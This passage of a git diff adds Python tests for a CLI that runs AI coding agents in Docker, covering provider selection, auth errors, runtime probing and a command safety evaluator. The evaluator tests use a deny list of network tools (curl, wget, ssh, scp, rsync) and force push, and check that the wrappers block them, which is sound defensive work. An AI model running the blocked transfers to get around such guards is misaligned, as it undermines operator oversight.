test_resolve_provider_stays_codex(self) -> None: + """Resume provider='codex' resolves to codex regardless of auth state.""" + adapters = _mock_adapters(connected_providers=("claude",)) # codex not connected + provider_id, source = resolve_launch_provider( + cli_flag=None, + resume_provider="codex", + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=False, + ) + assert provider_id == "codex" + assert source == ProviderResolutionSource.RESUME + + @patch("scc_cli.commands.launch.preflight._check_image_available") + def test_readiness_shows_auth_missing(self, mock_image: MagicMock) -> None: + """collect_launch_readiness detects missing auth for resume provider.""" + mock_image.return_value = ImageStatus.AVAILABLE + adapters = _mock_adapters(connected_providers=("claude",)) # codex auth missing + + readiness = collect_launch_readiness("codex", ProviderResolutionSource.RESUME, adapters) + assert readiness.provider_id == "codex" + assert readiness.auth_status == AuthStatus.MISSING + assert readiness.requires_auth_bootstrap is True + assert readiness.launch_ready is False + + def test_ensure_ready_non_interactive_raises_with_auth_guidance(self) -> None: + """Non-interactive resume with missing auth raises ProviderNotReadyError.""" + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.RESUME, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=True, + show_notice=MagicMock(), + ) + assert "codex" in exc_info.value.suggested_action.lower() + assert "interactively" in exc_info.value.suggested_action.lower() + + +# ────────────────────────────────────────────────────────────────────────────── +# 2. Resume with image removed → auto-build (interactive) / fail (non-interactive) +# ────────────────────────────────────────────────────────────────────────────── + + +class TestResumeWithImageRemoved: + """When a Codex session is resumed but the image was removed.""" + + @patch("scc_cli.commands.launch.preflight._check_image_available") + def test_readiness_shows_image_missing(self, mock_image: MagicMock) -> None: + """collect_launch_readiness detects missing image.""" + mock_image.return_value = ImageStatus.MISSING + adapters = _mock_adapters(connected_providers=("claude", "codex")) + + readiness = collect_launch_readiness("codex", ProviderResolutionSource.RESUME, adapters) + assert readiness.image_status == ImageStatus.MISSING + assert readiness.requires_image_bootstrap is True + assert readiness.launch_ready is False + + @patch("scc_cli.commands.launch.provider_image.ensure_provider_image") + def test_ensure_ready_triggers_image_build_interactive(self, mock_build: MagicMock) -> None: + """Interactive mode triggers auto-build when image is missing.""" + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.RESUME, + image_status=ImageStatus.MISSING, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=True, + requires_auth_bootstrap=False, + launch_ready=False, + ) + console_mock = MagicMock() + notice_mock = MagicMock() + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=console_mock, + non_interactive=False, + show_notice=notice_mock, + ) + mock_build.assert_called_once_with( + "codex", + console=console_mock, + non_interactive=False, + show_notice=notice_mock, + ) + + @patch("scc_cli.commands.launch.provider_image._provider_image_exists", return_value=False) + @patch("scc_cli.commands.launch.provider_image.get_provider_build_command") + def test_ensure_ready_fails_non_interactive_with_build_command( + self, mock_cmd: MagicMock, _mock_exists: MagicMock + ) -> None: + """Non-interactive mode raises with build command in the error.""" + mock_cmd.return_value = ["docker", "build", "-t", "scc-agent-codex:latest", "."] + + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.RESUME, + image_status=ImageStatus.MISSING, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=True, + requires_auth_bootstrap=False, + launch_ready=False, + ) + with pytest.raises(Exception) as exc_info: + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=True, + show_notice=MagicMock(), + ) + # Should contain build instructions + err = exc_info.value + assert "docker build" in err.suggested_action.lower() + + +# ────────────────────────────────────────────────────────────────────────────── +# 3. Explicit --provider overrides resume provider +# ────────────────────────────────────────────────────────────────────────────── + + +class TestExplicitProviderOverridesResume: + """CLI flag --provider claude overrides a codex resume session.""" + + def test_cli_flag_overrides_resume_provider(self) -> None: + """Explicit --provider claude wins over session resume_provider=codex.""" + adapters = _mock_adapters() + provider_id, source = resolve_launch_provider( + cli_flag="claude", + resume_provider="codex", + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=False, + ) + assert provider_id == "claude" + assert source == ProviderResolutionSource.EXPLICIT + + def test_cli_flag_overrides_with_different_providers(self) -> None: + """Also works when --provider codex overrides a claude session.""" + adapters = _mock_adapters() + provider_id, source = resolve_launch_provider( + cli_flag="codex", + resume_provider="claude", + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=False, + ) + assert provider_id == "codex" + assert source == ProviderResolutionSource.EXPLICIT + + +# ────────────────────────────────────────────────────────────────────────────── +# 4. Session provider no longer allowed → ProviderNotAllowedError +# ────────────────────────────────────────────────────────────────────────────── + + +class TestResumeProviderNoLongerAllowed: + """When a session has provider_id='codex' but team policy now only allows claude.""" + + def test_resume_provider_not_in_allowed_raises(self) -> None: + """Resume provider blocked by team policy raises ProviderNotAllowedError.""" + adapters = _mock_adapters() + org = _mock_org_with_allowed(("claude",)) + + with pytest.raises(ProviderNotAllowedError) as exc_info: + resolve_launch_provider( + cli_flag=None, + resume_provider="codex", + workspace_path=None, + config_provider=None, + normalized_org=org, + team="team-a", + adapters=adapters, + non_interactive=False, + ) + assert exc_info.value.provider_id == "codex" + assert "claude" in exc_info.value.allowed_providers + + def test_explicit_cli_provider_not_allowed_also_raises(self) -> None: + """Even explicit --provider codex fails if team policy blocks it.""" + adapters = _mock_adapters() + org = _mock_org_with_allowed(("claude",)) + + with pytest.raises(ProviderNotAllowedError) as exc_info: + resolve_launch_provider( + cli_flag="codex", + resume_provider=None, + workspace_path=None, + config_provider=None, + normalized_org=org, + team="team-a", + adapters=adapters, + non_interactive=False, + ) + assert exc_info.value.provider_id == "codex" + + +# ────────────────────────────────────────────────────────────────────────────── +# 5. Legacy session with provider_id=None → falls back to claude (D032) +# ────────────────────────────────────────────────────────────────────────────── + + +class TestLegacySessionFallback: + """Legacy sessions with no provider_id fall back to claude per D032.""" + + def test_none_resume_provider_falls_through(self) -> None: + """resume_provider=None means the resume tier is skipped in precedence.""" + adapters = _mock_adapters(connected_providers=("claude",)) + provider_id, source = resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + # With only claude connected and no other preferences, auto-single + # picks claude + assert provider_id == "claude" + assert source == ProviderResolutionSource.AUTO_SINGLE + + def test_none_resume_with_global_claude_preference(self) -> None: + """Legacy session + global preference='claude' → resolves to claude.""" + adapters = _mock_adapters(connected_providers=("claude", "codex")) + provider_id, source = resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=None, + config_provider="claude", + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + assert provider_id == "claude" + assert source == ProviderResolutionSource.GLOBAL_PREFERRED + + def test_legacy_session_multiple_connected_non_interactive_raises(self) -> None: + """Legacy session (None provider) with multiple connected providers in + non-interactive mode raises ProviderNotReadyError — never silently picks.""" + adapters = _mock_adapters(connected_providers=("claude", "codex")) + with pytest.raises(ProviderNotReadyError): + resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=None, + config_provider=None, + normalized_org=None, + team=None, + adapters=adapters, + non_interactive=True, + ) + + +# ────────────────────────────────────────────────────────────────────────────── +# 6. Explicit --provider codex + missing auth in non-interactive → typed error +# ────────────────────────────────────────────────────────────────────────────── + + +class TestExplicitProviderMissingAuthNonInteractive: + """--provider codex in non-interactive mode with missing auth → ProviderNotReadyError.""" + + def test_non_interactive_missing_auth_raises_with_guidance(self) -> None: + """Non-interactive launch with missing auth gives actionable message.""" + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=True, + show_notice=MagicMock(), + ) + err = exc_info.value + assert "non-interactive" in err.user_message.lower() + assert "scc start --provider codex" in err.suggested_action + assert "interactively" in err.suggested_action.lower() + + def test_non_interactive_missing_auth_does_not_prompt(self) -> None: + """Non-interactive mode never calls show_notice.""" + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + show_notice = MagicMock() + with pytest.raises(ProviderNotReadyError): + ensure_launch_ready( + readiness, + adapters=MagicMock(), + console=MagicMock(), + non_interactive=True, + show_notice=show_notice, + ) + show_notice.assert_not_called() + + def test_interactive_missing_auth_calls_show_notice(self) -> None: + """Interactive mode shows notice before auth bootstrap.""" + readiness = LaunchReadiness( + provider_id="codex", + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + show_notice = MagicMock() + _ensure_auth( + readiness, + adapters=MagicMock(), + non_interactive=False, + show_notice=show_notice, + ) + show_notice.assert_called_once() + call_args = show_notice.call_args[0] + assert "authenticating" in call_args[0].lower() + + +# ────────────────────────────────────────────────────────────────────────────── +# 7. Auth bootstrap callback failure → clean ProviderNotReadyError wrapping +# ────────────────────────────────────────────────────────────────────────────── + + +class TestAuthBootstrapCallbackFailure: + """When bootstrap_auth() raises an unexpected error, ensure_provider_auth + wraps it in a clean ProviderNotReadyError with guidance.""" + + def test_port_unavailable_raises_provider_not_ready(self) -> None: + """Codex port-unavailable produces ProviderNotReadyError with guidance.""" + with patch( + "scc_cli.adapters.codex_auth._is_local_callback_port_available", + return_value=False, + ): + from scc_cli.adapters.codex_auth import run_codex_browser_auth + + with pytest.raises(ProviderNotReadyError) as exc_info: + run_codex_browser_auth() + assert "1455" in exc_info.value.user_message + assert "port" in exc_info.value.suggested_action.lower() + + def test_bootstrap_auth_oserror_wrapped_in_provider_not_ready(self) -> None: + """OSError from bootstrap_auth() is wrapped in ProviderNotReadyError.""" + plan = MagicMock() + plan.resume = False + + provider = _make_codex_provider_mock( + auth_status="missing", + bootstrap_raises=OSError("socket binding failed"), + ) + deps = MagicMock() + deps.agent_provider = provider + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=MagicMock(), + ) + err = exc_info.value + assert "codex" in err.provider_id + assert "interactively" in err.suggested_action.lower() + + def test_bootstrap_auth_file_not_found_wrapped(self) -> None: + """FileNotFoundError (Docker not installed) is wrapped cleanly.""" + plan = MagicMock() + plan.resume = False + + provider = _make_codex_provider_mock( + auth_status="missing", + bootstrap_raises=FileNotFoundError("docker: command not found"), + ) + deps = MagicMock() + deps.agent_provider = provider + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=MagicMock(), + ) + err = exc_info.value + assert "codex" in err.provider_id + assert "sign-in" in err.suggested_action.lower() + + def test_bootstrap_auth_subprocess_timeout_wrapped(self) -> None: + """subprocess.TimeoutExpired is wrapped in ProviderNotReadyError.""" + plan = MagicMock() + plan.resume = False + + provider = _make_codex_provider_mock( + auth_status="missing", + bootstrap_raises=subprocess.TimeoutExpired(cmd="docker", timeout=30), + ) + deps = MagicMock() + deps.agent_provider = provider + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=MagicMock(), + ) + err = exc_info.value + assert "codex" in err.provider_id + + def test_provider_not_ready_from_bootstrap_passes_through(self) -> None: + """ProviderNotReadyError from bootstrap_auth passes through unchanged.""" + plan = MagicMock() + plan.resume = False + + original_error = ProviderNotReadyError( + provider_id="codex", + user_message="Codex browser sign-in did not complete successfully.", + suggested_action="Retry the sign-in flow.", + ) + provider = _make_codex_provider_mock( + auth_status="missing", + bootstrap_raises=original_error, + ) + deps = MagicMock() + deps.agent_provider = provider + + with pytest.raises(ProviderNotReadyError) as exc_info: + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=MagicMock(), + ) + # Should be the exact same error, not a re-wrap + assert exc_info.value is original_error + + def test_resume_skips_auth_bootstrap(self) -> None: + """When plan.resume=True, ensure_provider_auth returns early.""" + plan = MagicMock() + plan.resume = True + + provider = _make_codex_provider_mock(auth_status="missing") + deps = MagicMock() + deps.agent_provider = provider + + # Should not raise — resume skips auth bootstrap entirely + ensure_provider_auth( + plan, + dependencies=deps, + non_interactive=False, + show_notice=MagicMock(), + ) + provider.auth_check.assert_not_called() + provider.bootstrap_auth.assert_not_called() diff --git a/tests/test_runtime_detection_hotspots.py b/tests/test_runtime_detection_hotspots.py new file mode 100644 index 0000000..5215c06 --- /dev/null +++ b/tests/test_runtime_detection_hotspots.py @@ -0,0 +1,80 @@ +"""Guardrail: prevent stale docker.check_docker_available() calls outside the adapter layer. + +After the RuntimeProbe migration (M003-S01), all Docker availability detection +must go through the probe adapter. Direct calls to check_docker_available() +should only exist in: + +- scc_cli/docker/core.py — original definition +- scc_cli/docker/__init__.py — re-export +- scc_cli/adapters/docker_runtime_probe.py — the adapter that wraps it + +Any other occurrence is a regression: new code should use RuntimeProbe instead. +""" + +from __future__ import annotations + +import tokenize +from io import BytesIO +from pathlib import Path + +SRC = Path(__file__).resolve().parents[1] / "src" / "scc_cli" + +# Files where check_docker_available is allowed to appear +ALLOWED_FILES = { + SRC / "docker" / "core.py", # definition + SRC / "docker" / "__init__.py", # re-export + SRC / "adapters" / "docker_runtime_probe.py", # probe adapter wrapping it +} + +TOKEN = "check_docker_available" + + +def _has_code_reference(source: str) -> list[tuple[int, str]]: + """Return (lineno, line_text) for lines that reference the token in code, not strings/comments.""" + hits: list[tuple[int, str]] = [] + lines = source.splitlines() + + # Collect line numbers that contain the token only inside strings or comments + # by tokenizing and checking where NAME tokens with our target appear. + try: + tokens = list(tokenize.tokenize(BytesIO(source.encode()).readline)) + except tokenize.TokenError: + # If tokenization fails, fall back to AST-only checking + return hits + + for tok in tokens: + if tok.type == tokenize.NAME and tok.string == TOKEN: + lineno = tok.start[0] + hits.append((lineno, lines[lineno - 1].strip())) + + return hits + + +def test_no_stale_check_docker_available_calls() -> None: + """No file outside the allowlist should reference check_docker_available in code. + + If this test fails, you are calling docker.check_docker_available() + directly instead of going through RuntimeProbe. Use the probe adapter's + ensure_available() or probe() method instead. + """ + violations: list[str] = [] + + for py_file in sorted(SRC.rglob("*.py")): + if py_file in ALLOWED_FILES: + continue + + source = py_file.read_text(encoding="utf-8") + if TOKEN not in source: + continue + + for lineno, line_text in _has_code_reference(source): + rel = py_file.relative_to(SRC) + violations.append(f" {rel}:{lineno}: {line_text}") + + if violations: + msg = ( + "Direct check_docker_available() usage found outside the adapter layer.\n" + "Use RuntimeProbe.probe() or ensure_available() instead.\n\n" + "Violations:\n" + "\n".join(violations) + ) + raise AssertionError(msg) diff --git a/tests/test_runtime_probe.py b/tests/test_runtime_probe.py new file mode 100644 index 0000000..10068ef --- /dev/null +++ b/tests/test_runtime_probe.py @@ -0,0 +1,152 @@ +"""Tests for DockerRuntimeProbe adapter. + +Covers four detection scenarios by patching the helpers where +the adapter module imported them. +""" + +from __future__ import annotations + +from unittest.mock import patch + +from scc_cli.adapters.docker_runtime_probe import DockerRuntimeProbe + +# Patch targets: the names as imported into the adapter module. +_MOD = "scc_cli.adapters.docker_runtime_probe" + + +class TestDockerRuntimeProbeDesktopPresent: + """Docker Desktop present: all capabilities available.""" + + @patch(f"{_MOD}._check_docker_installed", return_value=True) + @patch(f"{_MOD}.get_docker_version", return_value="Docker version 27.5.1, build abc1234") + @patch(f"{_MOD}.run_command_bool", return_value=True) + @patch(f"{_MOD}.run_command", return_value="[name=seccomp,name=rootless]") + @patch(f"{_MOD}.get_docker_desktop_version", return_value="4.50.0") + @patch(f"{_MOD}.check_docker_sandbox", return_value=True) + def test_full_desktop_capabilities( + self, + _mock_sandbox: object, + _mock_desktop: object, + _mock_run_cmd: object, + _mock_daemon: object, + _mock_version: object, + _mock_installed: object, + ) -> None: + probe = DockerRuntimeProbe() + info = probe.probe() + + assert info.runtime_id == "docker" + assert info.display_name == "Docker Desktop" + assert info.cli_name == "docker" + assert info.supports_oci is True + assert info.supports_internal_networks is True + assert info.supports_host_network is True + assert info.version == "Docker version 27.5.1, build abc1234" + assert info.desktop_version == "4.50.0" + assert info.daemon_reachable is True + assert info.sandbox_available is True + assert info.rootless is True + assert info.preferred_backend == "docker-sandbox" + + +class TestDockerRuntimeProbeEngineOnly: + """Docker Engine only: no Desktop, no sandbox.""" + + @patch(f"{_MOD}._check_docker_installed", return_value=True) + @patch(f"{_MOD}.get_docker_version", return_value="Docker version 24.0.7, build afdd53b") + @patch(f"{_MOD}.run_command_bool", return_value=True) + @patch(f"{_MOD}.run_command", return_value="[name=seccomp,name=cgroupns]") + @patch(f"{_MOD}.get_docker_desktop_version", return_value=None) + @patch(f"{_MOD}.check_docker_sandbox", return_value=False) + def test_engine_only( + self, + _mock_sandbox: object, + _mock_desktop: object, + _mock_run_cmd: object, + _mock_daemon: object, + _mock_version: object, + _mock_installed: object, + ) -> None: + probe = DockerRuntimeProbe() + info = probe.probe() + + assert info.runtime_id == "docker" + assert info.display_name == "Docker Engine" + assert info.supports_oci is True + assert info.desktop_version is None + assert info.daemon_reachable is True + assert info.sandbox_available is False + assert info.rootless is False + assert info.preferred_backend == "oci" + + +class TestDockerRuntimeProbeNotInstalled: + """Docker not installed: everything false/None.""" + + @patch(f"{_MOD}._check_docker_installed", return_value=False) + def test_not_installed(self, _mock_installed: object) -> None: + probe = DockerRuntimeProbe() + info = probe.probe() + + assert info.runtime_id == "docker" + assert info.display_name == "Docker (not installed)" + assert info.supports_oci is False + assert info.supports_internal_networks is False + assert info.supports_host_network is False + assert info.version is None + assert info.desktop_version is None + assert info.daemon_reachable is False + assert info.sandbox_available is False + assert info.preferred_backend is None + + +class TestDockerRuntimeProbeDaemonNotRunning: + """Docker installed but daemon not running.""" + + @patch(f"{_MOD}._check_docker_installed", return_value=True) + @patch(f"{_MOD}.get_docker_version", return_value="Docker version 27.5.1, build abc1234") + @patch(f"{_MOD}.run_command_bool", return_value=False) + def test_daemon_not_running( + self, + _mock_daemon: object, + _mock_version: object, + _mock_installed: object, + ) -> None: + probe = DockerRuntimeProbe() + info = probe.probe() + + assert info.runtime_id == "docker" + assert info.display_name == "Docker (daemon not running)" + assert info.supports_oci is True + assert info.supports_internal_networks is False + assert info.supports_host_network is False + assert info.version == "Docker version 27.5.1, build abc1234" + assert info.daemon_reachable is False + assert info.sandbox_available is False + assert info.preferred_backend is None + + +class TestDockerRuntimeProbeRootlessDetectionFailure: + """Rootless detection fails gracefully when run_command raises.""" + + @patch(f"{_MOD}._check_docker_installed", return_value=True) + @patch(f"{_MOD}.get_docker_version", return_value="Docker version 24.0.7, build afdd53b") + @patch(f"{_MOD}.run_command_bool", return_value=True) + @patch(f"{_MOD}.run_command", side_effect=OSError("docker info failed")) + @patch(f"{_MOD}.get_docker_desktop_version", return_value=None) + @patch(f"{_MOD}.check_docker_sandbox", return_value=False) + def test_rootless_detection_failure_returns_none( + self, + _mock_sandbox: object, + _mock_desktop: object, + _mock_run_cmd: object, + _mock_daemon: object, + _mock_version: object, + _mock_installed: object, + ) -> None: + probe = DockerRuntimeProbe() + info = probe.probe() + + assert info.rootless is None + assert info.daemon_reachable is True + assert info.preferred_backend == "oci" diff --git a/tests/test_runtime_wrappers.py b/tests/test_runtime_wrappers.py new file mode 100644 index 0000000..bd0f84f --- /dev/null +++ b/tests/test_runtime_wrappers.py @@ -0,0 +1,252 @@ +"""Integration tests for the standalone safety evaluator CLI and shell wrappers. + +Tests the full wrapper → evaluator → verdict chain via subprocess calls +to ``python3 -m scc_safety_eval``. Shell wrappers themselves need Docker, +so we test them for structural correctness (existence, permissions, content) +rather than live execution. +""" + +from __future__ import annotations + +import json +import os +import stat +import subprocess +import tempfile +from pathlib import Path + +import pytest + +_PROJECT_ROOT = Path(__file__).resolve().parent.parent +_WRAPPERS_DIR = _PROJECT_ROOT / "images" / "scc-base" / "wrappers" +_BIN_DIR = _WRAPPERS_DIR / "bin" + +_TOOLS = ["git", "curl", "wget", "ssh", "scp", "sftp", "rsync"] + + +def _run_evaluator( + args: list[str], + *, + policy_path: str | None = None, + env_override: dict[str, str] | None = None, +) -> subprocess.CompletedProcess[str]: + """Run the standalone evaluator CLI via subprocess.""" + env = os.environ.copy() + env["PYTHONPATH"] = str(_WRAPPERS_DIR) + if policy_path is not None: + env["SCC_POLICY_PATH"] = policy_path + elif "SCC_POLICY_PATH" in env: + del env["SCC_POLICY_PATH"] + if env_override: + env.update(env_override) + return subprocess.run( + ["python3", "-m", "scc_safety_eval", *args], + capture_output=True, + text=True, + env=env, + ) + + +def _write_policy(tmp_dir: str, policy: dict) -> str: + """Write a policy JSON file and return its path.""" + path = os.path.join(tmp_dir, "policy.json") + with open(path, "w") as f: + json.dump(policy, f) + return path + + +# ── Shell wrapper structural tests ──────────────────────────────────────── + + +class TestWrapperScripts: + """Verify shell wrapper scripts exist and are well-formed.""" + + @pytest.mark.parametrize("tool", _TOOLS) + def test_wrapper_exists(self, tool: str) -> None: + wrapper = _BIN_DIR / tool + assert wrapper.exists(), f"Wrapper script missing: {wrapper}" + + @pytest.mark.parametrize("tool", _TOOLS) + def test_wrapper_is_executable(self, tool: str) -> None: + wrapper = _BIN_DIR / tool + mode = wrapper.stat().st_mode + assert mode & stat.S_IXUSR, f"Wrapper not executable: {wrapper}" + + @pytest.mark.parametrize("tool", _TOOLS) + def test_wrapper_uses_absolute_real_bin(self, tool: str) -> None: + content = (_BIN_DIR / tool).read_text() + assert f"REAL_BIN=/usr/bin/{tool}" in content, ( + f"Wrapper for {tool} does not set REAL_BIN to absolute path" + ) + + @pytest.mark.parametrize("tool", _TOOLS) + def test_wrapper_calls_evaluator(self, tool: str) -> None: + content = (_BIN_DIR / tool).read_text() + assert "python3 -m scc_safety_eval" in content, ( + f"Wrapper for {tool} does not invoke the evaluator" + ) + + @pytest.mark.parametrize("tool", _TOOLS) + def test_wrapper_uses_basename(self, tool: str) -> None: + """Wrapper passes basename of $0 as tool name — prevents path prefix issues.""" + content = (_BIN_DIR / tool).read_text() + assert 'basename "$0"' in content, f"Wrapper for {tool} does not use basename for tool name" + + @pytest.mark.parametrize("tool", _TOOLS) + def test_wrapper_has_bash_shebang(self, tool: str) -> None: + content = (_BIN_DIR / tool).read_text() + assert content.startswith("#!/bin/bash"), f"Wrapper for {tool} missing bash shebang" + + +# ── Evaluator CLI tests (blocked/allowed/fail-closed) ───────────────────── + + +class TestEvaluatorBlocked: + """Commands that should be blocked (exit code 2).""" + + def test_git_force_push_blocked(self) -> None: + result = _run_evaluator(["git", "push", "--force", "origin", "main"]) + assert result.returncode == 2 + assert result.stderr.strip() # reason on stderr + + def test_curl_blocked(self) -> None: + result = _run_evaluator(["curl", "https://example.com"]) + assert result.returncode == 2 + + def test_wget_blocked(self) -> None: + result = _run_evaluator(["wget", "https://example.com/file.tar.gz"]) + assert result.returncode == 2 + + def test_ssh_blocked(self) -> None: + result = _run_evaluator(["ssh", "user@host"]) + assert result.returncode == 2 + + def test_scp_blocked(self) -> None: + result = _run_evaluator(["scp", "file.txt", "user@host:/tmp/"]) + assert result.returncode == 2 + + def test_sftp_blocked(self) -> None: + result = _run_evaluator(["sftp", "user@host"]) + assert result.returncode == 2 + + def test_rsync_blocked(self) -> None: + result = _run_evaluator(["rsync", "-avz", "src/", "host:/dst/"]) + assert result.returncode == 2 + + +class TestEvaluatorAllowed: + """Commands that should be allowed (exit code 0).""" + + def test_git_status_allowed(self) -> None: + result = _run_evaluator(["git", "status"]) + assert result.returncode == 0 + + def test_git_log_allowed(self) -> None: + result = _run_evaluator(["git", "log", "--oneline"]) + assert result.returncode == 0 + + def test_safe_command_ls(self) -> None: + result = _run_evaluator(["ls", "-la"]) + assert result.returncode == 0 + + def test_safe_git_push(self) -> None: + result = _run_evaluator(["git", "push", "origin", "main"]) + assert result.returncode == 0 + + +class TestEvaluatorFailClosed: + """Fail-closed behavior when policy is missing or broken.""" + + def test_no_policy_path_blocks_dangerous_commands(self) -> None: + """Without SCC_POLICY_PATH, dangerous commands should still be blocked.""" + result = _run_evaluator(["git", "push", "--force"]) + assert result.returncode == 2 + + def test_no_policy_path_allows_safe_commands(self) -> None: + """Without SCC_POLICY_PATH, safe commands should still be allowed.""" + result = _run_evaluator(["git", "status"]) + assert result.returncode == 0 + + def test_nonexistent_policy_file_blocks_dangerous(self) -> None: + result = _run_evaluator( + ["git", "push", "--force"], + policy_path="/nonexistent/policy.json", + ) + assert result.returncode == 2 + + def test_malformed_json_blocks_dangerous(self) -> None: + with tempfile.TemporaryDirectory() as tmp: + path = os.path.join(tmp, "bad.json") + with open(path, "w") as f: + f.write("{not valid json") + result = _run_evaluator(["git", "push", "--force"], policy_path=path) + assert result.returncode == 2 + + def test_wrong_schema_blocks_dangerous(self) -> None: + """Policy file with valid JSON but wrong schema (missing 'action').""" + with tempfile.TemporaryDirectory() as tmp: + path = os.path.join(tmp, "bad_schema.json") + with open(path, "w") as f: + json.dump({"not_action": "allow"}, f) + result = _run_evaluator(["git", "push", "--force"], policy_path=path) + assert result.returncode == 2 + + +class TestEvaluatorPolicyOverrides: + """Tests for policy-based overrides (allow action, disabled rules).""" + + def test_allow_policy_permits_dangerous(self) -> None: + with tempfile.TemporaryDirectory() as tmp: + path = _write_policy(tmp, {"action": "allow", "rules": {}}) + result = _run_evaluator(["git", "push", "--force"], policy_path=path) + assert result.returncode == 0 + + def test_disabled_rule_permits_specific_command(self) -> None: + with tempfile.TemporaryDirectory() as tmp: + path = _write_policy(tmp, {"action": "block", "rules": {"block_force_push": False}}) + result = _run_evaluator(["git", "push", "--force", "origin", "main"], policy_path=path) + assert result.returncode == 0 + + def test_disabled_git_rule_does_not_affect_network(self) -> None: + with tempfile.TemporaryDirectory() as tmp: + path = _write_policy(tmp, {"action": "block", "rules": {"block_force_push": False}}) + result = _run_evaluator(["curl", "https://example.com"], policy_path=path) + assert result.returncode == 2 + + +# ── Negative / boundary tests ───────────────────────────────────────────── + + +class TestEvaluatorNegative: + """Malformed inputs, edge cases, and boundary conditions.""" + + def test_empty_tool_name(self) -> None: + """Empty tool name should not crash the evaluator.""" + result = _run_evaluator([""]) + assert result.returncode == 0 # empty string → no rules match → allowed + + def test_whitespace_only_args(self) -> None: + result = _run_evaluator(["git", " "]) + assert result.returncode == 0 # safe git command with whitespace arg + + def test_tool_with_path_prefix(self) -> None: + """Tool name with path prefix — evaluator uses the full first arg as tool.""" + result = _run_evaluator(["/usr/bin/git", "push", "--force"]) + # The evaluator joins args: "/usr/bin/git push --force" + # shell_tokenizer will strip the path, so it should still detect force push + assert result.returncode == 2 + + def test_no_arguments_shows_usage(self) -> None: + """Running evaluator with no args should show usage and exit 2.""" + env = os.environ.copy() + env["PYTHONPATH"] = str(_WRAPPERS_DIR) + if "SCC_POLICY_PATH" in env: + del env["SCC_POLICY_PATH"] + result = subprocess.run( + ["python3", "-m", "scc_safety_eval"], + capture_output=True, + text=True, + env=env, + ) + assert result.returncode == 2 + assert "Usage" in result.stdout or "Usage" in result.stderr diff --git a/tests/test_s02_provider_sessions.py b/tests/test_s02_provider_sessions.py new file mode 100644 index 0000000..777ab23 --- /dev/null +++ b/tests/test_s02_provider_sessions.py @@ -0,0 +1,232 @@ +"""Tests for S02 provider-parameterized session/audit/context helpers. + +Validates: +- get_provider_sessions_dir returns correct path per provider +- get_provider_recent_sessions returns empty list when no sessions.json +- get_provider_config_dir returns correct path per provider +- WorkContext.provider_id round-trip and backward compat +- WorkContext.display_label with and without provider +- Session list CLI includes provider_id in session_dicts +""" + +from __future__ import annotations + +import json +from pathlib import Path +from unittest.mock import patch + +import pytest + +from scc_cli.commands.audit import get_provider_config_dir +from scc_cli.contexts import WorkContext +from scc_cli.core.errors import InvalidProviderError +from scc_cli.sessions import get_provider_recent_sessions, get_provider_sessions_dir + +# ═══════════════════════════════════════════════════════════════════════════════ +# get_provider_sessions_dir / get_provider_recent_sessions +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderSessionsDir: + """Tests for sessions.get_provider_sessions_dir.""" + + def test_claude_returns_dot_claude(self) -> None: + result = get_provider_sessions_dir("claude") + assert result == Path.home() / ".claude" + + def test_codex_returns_dot_codex(self) -> None: + result = get_provider_sessions_dir("codex") + assert result == Path.home() / ".codex" + + def test_default_is_claude(self) -> None: + result = get_provider_sessions_dir() + assert result == Path.home() / ".claude" + + def test_unknown_provider_raises(self) -> None: + with pytest.raises(InvalidProviderError) as exc_info: + get_provider_sessions_dir("gemini") + assert "gemini" in str(exc_info.value) + + def test_provider_recent_sessions_empty_when_no_file(self, tmp_path: Path) -> None: + """get_provider_recent_sessions returns [] when sessions.json doesn't exist.""" + with patch( + "scc_cli.sessions.get_provider_sessions_dir", + return_value=tmp_path / "nonexistent", + ): + result = get_provider_recent_sessions("claude") + assert result == [] + + def test_provider_recent_sessions_reads_json(self, tmp_path: Path) -> None: + """get_provider_recent_sessions reads sessions from sessions.json.""" + sessions_dir = tmp_path / ".agent" + sessions_dir.mkdir() + sessions_file = sessions_dir / "sessions.json" + 